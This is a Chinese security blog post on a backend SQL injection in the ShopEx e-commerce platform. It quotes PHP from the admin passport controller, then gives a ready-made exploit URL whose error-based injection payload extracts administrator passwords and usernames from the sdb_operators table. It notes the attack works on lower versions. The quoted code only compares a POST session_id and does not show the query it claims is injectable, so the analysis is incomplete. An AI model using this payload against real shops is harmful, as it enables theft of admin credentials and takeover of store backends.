shopex最新后台页面注入

没穿底裤
没穿底裤
没穿底裤
714
文章
0
评论
2019年12月31日20:37:00评论296 views字数 839阅读2分47秒阅读模式
摘要

在/shopex/core/admin/controller/ctl.passport.php中跟踪后台登陆验证流程[php]
function certi_validate(){
$cert = $this->system->loadModel('service/certificate');
$sess_id = $_POST['session_id'];

在/shopex/core/admin/controller/ctl.passport.php中跟踪后台登陆验证流程

[php]
function certi_validate(){
$cert = $this->system->loadModel('service/certificate');
$sess_id = $_POST['session_id'];

$return = array();
if($sess_id == $cert->get_sess()){
$return = array(
'res' => 'succ',
'msg' => '',
'info' => ''
);

echo json_encode($return);
}else{
$return = array(
'res' => 'fail',
'msg' => '000001',
'info' => 'You have the different session!'
);

echo json_encode($return);
}
}[/php]
在参数sess_id传递的时候没有做任何的处理,直接带入查询了。

给出exp:
[php]http://www.0day5.com/shopadmin/index.php?ctl=passport&act=login&sess_id=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(userpass,0x7e,username,0x7e,op_id)+from+sdb_operators+Order+by+username+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'='1[/php]

表示不是通杀。低版本有效。
转载请注明版权。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日20:37:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   shopex最新后台页面注入https://cn-sec.com/archives/75199.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息